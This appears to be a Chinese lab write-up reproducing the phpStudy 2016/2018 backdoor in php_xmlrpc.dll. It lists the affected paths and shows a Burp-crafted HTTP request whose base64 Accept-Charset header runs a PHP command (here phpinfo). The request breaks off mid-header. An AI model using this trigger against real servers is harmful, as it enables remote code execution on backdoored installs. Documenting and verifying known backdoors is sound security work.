通过查阅资料,后门代码存在于\ext\php_xmlrpc.dll模块中
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl
网上下载后门版本,我这里用的是2016版本
查看phpstudy下的php\php-5.2.17\ext\php_xmlrpc.dll动态链接文件
搜索敏感函数eval 发现的确存在
现在我们来验证一下
用burp抓取访问本机ip地址包,添加
accept-charset: IHBocGluZm8oKTs=(这个是执行的命令,用base64编码的)
Upgrade-Insecure-Requests: 1
注意:
这里gzip,deflate中间开始有空格,要去掉;
末尾回车额外添加一行空行
GET / HTTP/1.1
Host: 192.168.31.132
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/